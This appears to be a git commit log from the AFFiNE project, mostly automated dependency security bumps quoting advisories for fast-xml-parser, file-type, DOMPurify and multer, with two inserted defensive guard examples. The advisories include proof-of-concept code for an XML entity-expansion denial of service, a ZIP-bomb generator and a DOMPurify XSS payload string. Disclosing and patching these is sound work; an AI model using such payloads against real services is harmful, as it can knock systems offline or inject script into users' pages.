XML entities (`&lt;`, `&gt;`, etc.) are processed through a separate
code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to
completely bypass all configured limits, causing excessive memory
allocation and CPU consumption.

## Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

## Root Cause

In `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()`
function has two separate entity replacement loops:

1. **Lines 638-670**: DOCTYPE entities — expansion counting with
`entityExpansionCount` and `currentExpandedLength` tracking. This was
the CVE-2026-26278 fix.
2. **Lines 674-677**: `lastEntities` loop — replaces standard entities
including `num_dec` (`/&#([0-9]{1,7});/g`) and `num_hex`
(`/&#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at
all.**

The numeric entity regex replacements at lines 97-98 are part of
`lastEntities` and go through the uncounted loop, completely bypassing
the CVE-2026-26278 fix.

## Proof of Concept

```javascript
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100
```

**Results:**
- 100K `&#65;` references → 500,000 char output (5x default
maxExpandedLength of 100,000)
- 1M references → 5,000,000 char output, ~147MB memory consumed
- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K
references produce 50,000 chars
- Hex entities (`&#x41;`) exhibit the same bypass

## Impact

**Denial of Service** — An attacker who can provide XML input to
applications using fast-xml-parser can cause:
- Excessive memory allocation (147MB+ for 1M entity references)
- CPU consumption during regex replacement
- Potential process crash via OOM

This is particularly dangerous because the application developer may
have explicitly configured strict entity expansion limits believing they
are protected, while numeric entities silently bypass all of them.

## Suggested Fix

Apply the same `entityExpansionCount` and `currentExpandedLength`
tracking to the `lastEntities` loop (lines 674-677) and the HTML
entities loop (lines 680-686), similar to how DOCTYPE entities are
tracked at lines 638-670.

## Workaround

Set `htmlEntities:false`

---

### Release Notes

<details>
<summary>NaturalIntelligence/fast-xml-parser (fast-xml-parser)</summary>

###
[`v5.5.6`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/e54155f53048e9d58e27f170d3ccff15176b6671...870043e75e78545192bc70950c6286d36c7cdf23)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6)

###
[`v5.5.5`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/ea07bb2e8435a88136c0e46d7ee8a345107b7582...e54155f53048e9d58e27f170d3ccff15176b6671)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.4...v5.5.5)

###
[`v5.5.4`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...ea07bb2e8435a88136c0e46d7ee8a345107b7582)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.4)

###
[`v5.5.3`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

###
[`v5.5.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...e0a14f7d15a293732e630ce1b7faa39924de2359)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2)

###
[`v5.5.1`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.1):
integrate path-expression-matcher

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.0...v5.5.1)

- support path-expression-matcher
- fix: stopNode should not be parsed
- performance improvement for stopNode checking

###
[`v5.5.0`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...ce017923460f92861e8fc94c91e52f9f5bd6a1b0)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...v5.5.0)

###
[`v5.4.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-18 13:28:53 +08:00
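A defence-in-depth check for the gap described in CVE-2026-33036 above, as an added example that is not fast-xml-parser code and not the project's fix: it counts numeric character references and predefined entities in untrusted XML before any parser sees it. The decimal and hex patterns are the ones quoted in the advisory; `checkEntityBudget`, `guardedParse` and the limit names are hypothetical, and `parse` is whatever parser function the caller supplies.

```javascript
// Added example: pre-parse reference budget for untrusted XML.

// Decimal and hex character references (patterns quoted in the advisory)
// plus the five predefined XML entities.
const REFERENCE_SOURCE =
  '&#[0-9]{1,7};|&#x[0-9a-fA-F]{1,6};|&(?:lt|gt|amp|quot|apos);';

// Returns a verdict without throwing, so callers can log the reason.
function checkEntityBudget(xml, limits) {
  if (typeof xml !== 'string') {
    return { ok: false, reason: 'not-a-string', references: 0 };
  }
  // Cheap length cap first: it bounds the cost of the scan below.
  if (xml.length > limits.maxInputLength) {
    return { ok: false, reason: 'input-too-long', references: 0 };
  }
  // Fresh regex per call: a shared /g regex would carry lastIndex state.
  const re = new RegExp(REFERENCE_SOURCE, 'g');
  let references = 0;
  while (re.exec(xml) !== null) {
    references += 1;
    // Stop at the first reference over budget instead of scanning the rest.
    if (references > limits.maxReferences) {
      return { ok: false, reason: 'too-many-references', references };
    }
  }
  return { ok: true, reason: null, references };
}

// Wrap any parser so over-budget documents never reach it.
function guardedParse(xml, parse, limits) {
  const verdict = checkEntityBudget(xml, limits);
  if (!verdict.ok) {
    throw new RangeError(`XML rejected before parsing: ${verdict.reason}`);
  }
  return parse(xml);
}

// Constructed sample inputs and limits.
const LIMITS = { maxInputLength: 10000, maxReferences: 10 };
const benignXml = '<root>a &lt; b &#65; &#x41;</root>';
const overBudgetXml = `<root>${'&#65;'.repeat(50)}</root>`;

console.log(checkEntityBudget(benignXml, LIMITS));
console.log(checkEntityBudget(overBudgetXml, LIMITS));
```

The guard complements upgrading to the fixed release; it does not replace it, and the limits should be sized from the largest legitimate document the application accepts.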
renovate[bot] f537a75f01 chore: bump up file-type version to v21.3.2 [SECURITY] (#14655)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.1` →
`21.3.2`](https://renovatebot.com/diffs/npm/file-type/21.3.1/21.3.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.1/21.3.2?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

####
[CVE-2026-32630](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v)

## Summary

A crafted ZIP file can trigger excessive memory growth during type
detection in `file-type` when using `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()`.

In affected versions, the ZIP inflate output limit is enforced for
stream-based detection, but not for known-size inputs. As a result, a
small compressed ZIP can cause `file-type` to inflate and process a much
larger payload while probing ZIP-based formats such as OOXML. In testing
on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB`
of RSS growth during `fileTypeFromBuffer()`.

This is an availability issue. Applications that use these APIs on
untrusted uploads can be forced to consume large amounts of memory and
may become slow or crash.

## Root Cause

The ZIP detection logic applied different limits depending on whether
the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by
`maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as
buffers, blobs, and files, the code instead used
`Number.MAX_SAFE_INTEGER` in two relevant places:

```js
const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

and:

```js
const maximumLength = hasUnknownFileSize(this.tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

Together, these checks allowed a crafted ZIP to bypass the intended
inflate limit for known-size APIs and force large decompression during
detection of entries such as `[Content_Types].xml`.

## Proof of Concept

```js
import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
	return new Promise((resolve, reject) => {
		const chunks = [];
		const writable = new Writable({
			write(chunk, encoding, callback) {
				chunks.push(chunk);
				callback();
			},
		});

		const archive = archiver('zip', {zlib: {level: 9}});
		archive.pipe(writable);
		writable.on('finish', () => {
			resolve(Buffer.concat(chunks));
		});
		archive.on('error', reject);

		const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
		const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
		archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
		archive.finalize();
	});
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));
```

Observed on `file-type` `21.3.1`:
- ZIP size: about `255 KB`
- RSS growth during detection: about `257 MB`

## Affected APIs

Affected:
- `fileTypeFromBuffer()`
- `fileTypeFromBlob()`
- `fileTypeFromFile()`

Not affected:
- `fileTypeFromStream()`, which already enforced the ZIP inflate limit
for unknown-size inputs

## Impact

Applications that inspect untrusted uploads with `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume
excessive memory during ZIP-based type detection. This can degrade
service or lead to process termination in memory-constrained
environments.

## Cause

The issue was introduced in 399b0f1

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.2`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.2)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2)

- Fix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)
[`a155cd7`](https://redirect.github.com/sindresorhus/file-type/commit/a155cd7)
- Fix bound recursive BOM and ID3 detection
[`370ed91`](https://redirect.github.com/sindresorhus/file-type/commit/370ed91)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:44:06 +08:00
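Bounded inflation for the ZIP probing issue in CVE-2026-32630 above, as an added example that is not file-type's code or its patch: one output limit is applied to every entry regardless of whether the input size is known, using Node's `zlib` `maxOutputLength` option. `inflateBounded` and `probeContentTypes` are hypothetical names; the 1 MiB value is the stream-path limit named in the advisory.

```javascript
// Added example: cap inflate output before inspecting a ZIP entry.
const zlib = require('node:zlib');

const MAX_ENTRY_BYTES = 1024 * 1024; // 1 MiB, as named in the advisory

// Inflate a raw-deflate entry, refusing to produce more than `limit` bytes.
// The same limit applies to buffers, blobs, files and streams alike.
function inflateBounded(compressed, limit = MAX_ENTRY_BYTES) {
  try {
    const data = zlib.inflateRawSync(compressed, { maxOutputLength: limit });
    return { ok: true, reason: null, data };
  } catch (err) {
    // Node raises ERR_BUFFER_TOO_LARGE when the output limit is exceeded;
    // anything else is treated as a damaged stream.
    const reason =
      err && err.code === 'ERR_BUFFER_TOO_LARGE'
        ? 'inflate-limit-exceeded'
        : 'corrupt-stream';
    return { ok: false, reason, data: null };
  }
}

// Classify an entry the way an OOXML probe would, but only after the
// bounded inflate has succeeded.
function probeContentTypes(compressed, limit = MAX_ENTRY_BYTES) {
  const result = inflateBounded(compressed, limit);
  if (!result.ok) return 'rejected';
  return result.data.includes('<Types') ? 'content-types' : 'other';
}

// Constructed samples: a small well-formed entry and a highly compressible
// 4 MiB run of spaces that exceeds the limit once inflated.
const smallEntry = zlib.deflateRawSync(
  Buffer.from('<?xml version="1.0"?><Types/>')
);
const oversizedEntry = zlib.deflateRawSync(Buffer.alloc(4 * 1024 * 1024, 0x20));

console.log(probeContentTypes(smallEntry)); // content-types
console.log(probeContentTypes(oversizedEntry)); // rejected
```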
renovate[bot] d7d67841b8 chore: bump up file-type version to v21.3.1 [SECURITY] (#14625)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.0` →
`21.3.1`](https://renovatebot.com/diffs/npm/file-type/21.3.0/21.3.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.0/21.3.1?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

### [`v21.3.1`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.1)

[Compare Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1)

- Fix infinite loop in ASF parser on malformed input [`319abf8`](https://redirect.github.com/sindresorhus/file-type/commit/319abf8)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-11 13:58:31 +08:00
DarkSky 29a27b561b feat(server): migrate copilot to native (#14620)
#### PR Dependency Tree


* **PR #14620** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Native LLM workflows: structured outputs, embeddings, and reranking plus richer multimodal attachments (images, audio, files) and improved remote-attachment inlining.

* **Refactor**
  * Tooling API unified behind a local tool-definition helper; provider/adapters reorganized to route through native dispatch paths.

* **Chores**
  * Dependency updates, removed legacy Google SDK integrations, and increased front memory allocation.

* **Tests**
  * Expanded end-to-end and streaming tests exercising native provider flows, attachments, and rerank/structured scenarios.
2026-03-11 13:55:35 +08:00
DarkSky 9c55edeb62 feat(server): adapt gemini3.1 preview (#14583)
#### PR Dependency Tree


* **PR #14583** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Added Gemini 3.1 Pro Preview support (text, image, audio) and new GPT‑5 variants as defaults; centralized persistent telemetry state for more reliable client identity.

* **UX**
  * Improved model submenu placement in chat preferences.
  * More robust mindmap parsing, preview, regeneration and replace behavior.

* **Chores**
  * Bumped AI SDK and related dependencies.

* **Tests**
  * Expanded/updated tests and increased timeouts for flaky flows.
2026-03-08 00:53:16 +08:00
DarkSky f34e25e122 test: migrate test & utils (#14569)
#### PR Dependency Tree


* **PR #14569** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Upgraded development test tooling to Vitest v4 and added Playwright browser test integration; normalized test configurations and CI shard matrix.

* **Tests**
  * Added a large suite of new integration tests covering editor flows (edgeless, database, embeds, images, latex, code, clipboard, multi-editor, presentation, undo/redo, etc.).
  * Removed numerous end-to-end Playwright test suites across the same feature areas.
2026-03-07 04:12:27 +08:00
renovate[bot] 09fa1a8e4e chore: bump up dompurify version to v3.3.2 [SECURITY] (#14581)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.0` → `3.3.2`](https://renovatebot.com/diffs/npm/dompurify/3.3.0/3.3.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.3.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.0/3.3.2?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-0540](https://nvd.nist.gov/vuln/detail/CVE-2026-0540)

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in 2.5.9
and 3.3.2, contain a cross-site scripting vulnerability that allows
attackers to bypass attribute sanitization by exploiting five missing
rawtext elements (noscript, xmp, noembed, noframes, iframe) in the
`SAFE_FOR_XML` regex. Attackers can include payloads like
`</noscript><img src=x onerror=alert(1)>` in attribute values to execute
JavaScript when sanitized output is placed inside these unprotected
rawtext contexts.

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

### [`v3.3.2`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.2): DOMPurify 3.3.2

[Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.1...3.3.2)

- Fixed a possible bypass caused by jsdom's faulty raw-text tag parsing, thanks multiple reporters
- Fixed a prototype pollution issue when working with custom elements, thanks [@christos-eth](https://redirect.github.com/christos-eth)
- Fixed a lenient config parsing in `_isValidAttribute`, thanks [@christos-eth](https://redirect.github.com/christos-eth)
- Bumped and removed several dependencies, thanks [@Rotzbua](https://redirect.github.com/Rotzbua)
- Fixed the test suite after bumping dependencies, thanks [@Rotzbua](https://redirect.github.com/Rotzbua)

### [`v3.3.1`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.1): DOMPurify 3.3.1

[Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.0...3.3.1)

- Updated `ADD_FORBID_CONTENTS` setting to extend default list, thanks [@MariusRumpf](https://redirect.github.com/MariusRumpf)
- Updated the ESM import syntax to be more correct, thanks [@binhpv](https://redirect.github.com/binhpv)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 19:04:08 +08:00
DarkSky 7f5f7e79df feat(server): refactor mcp (#14579)
#### PR Dependency Tree


* **PR #14579** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Full JSON-RPC MCP endpoint with batch requests, per-message validation, method dispatch (initialize, ping, tools/list, tools/call) and request cancellation
  * Tool listing and execution with input validation, standardized results, and improved error responses

* **Chores**
  * Removed an external protocol dependency
  * Bumped MCP server version to 1.0.1
2026-03-06 06:35:34 +08:00
renovate[bot] bbc01533d7 chore: bump up multer version to v2.1.1 [SECURITY] (#14576)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.1.0` → `2.1.1`](https://renovatebot.com/diffs/npm/multer/2.1.0/2.1.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.1.0/2.1.1?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

#### [CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

#### [CVE-2026-3520](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2)

### Impact

A vulnerability in Multer versions < 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing stack overflow.

### Patches

Users should upgrade to `2.1.1`

### Workarounds

None

### Resources

- https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
- https://www.cve.org/CVERecord?id=CVE-2026-3520
- https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
- https://cna.openjsf.org/security-advisories.html

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

### [`v2.1.1`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#211)

[Compare Source](https://redirect.github.com/expressjs/multer/compare/v2.1.0...v2.1.1)

- Fix [CVE-2026-3520](https://www.cve.org/CVERecord?id=CVE-2026-3520) ([GHSA-5528-5vmv-3xc2](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2))
- fix error/abort handling

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 01:04:48 +08:00
renovate[bot] fc9b99cd17 chore: bump up ava version to v7 (#14563)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true) |
| [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true) |

---

### Release Notes

<details>
<summary>avajs/ava (ava)</summary>

### [`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0)

[Compare Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0)

##### What's Changed

- Replace `strip-ansi` with `node:util.stripVTControlCharacters` by [@fisker](https://redirect.github.com/fisker) in [#3403](https://redirect.github.com/avajs/ava/pull/3403)
- Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or newer or 24,12 or newer; update dependencies including transitive `glob` by [@novemberborn](https://redirect.github.com/novemberborn) in [#3416](https://redirect.github.com/avajs/ava/pull/3416)

**Full Changelog**: <https://github.com/avajs/ava/compare/v6.4.1...v7.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 17:47:47 +08:00
renovate[bot] 5464d1a9ce chore: bump up multer version to v2.1.0 [SECURITY] (#14544)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.0.2` → `2.1.0`](https://renovatebot.com/diffs/npm/multer/2.0.2/2.1.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.0.2/2.1.0?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

#### [CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

### [`v2.1.0`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#210)

[Compare Source](https://redirect.github.com/expressjs/multer/compare/v2.0.2...v2.1.0)

- Add `defParamCharset` option for UTF-8 filename support ([#1210](https://redirect.github.com/expressjs/multer/pull/1210))
- Fix [CVE-2026-2359](https://www.cve.org/CVERecord?id=CVE-2026-2359) ([GHSA-v52c-386h-88mc](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc))
- Fix [CVE-2026-3304](https://www.cve.org/CVERecord?id=CVE-2026-3304) ([GHSA-xf7r-hgr6-v32p](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
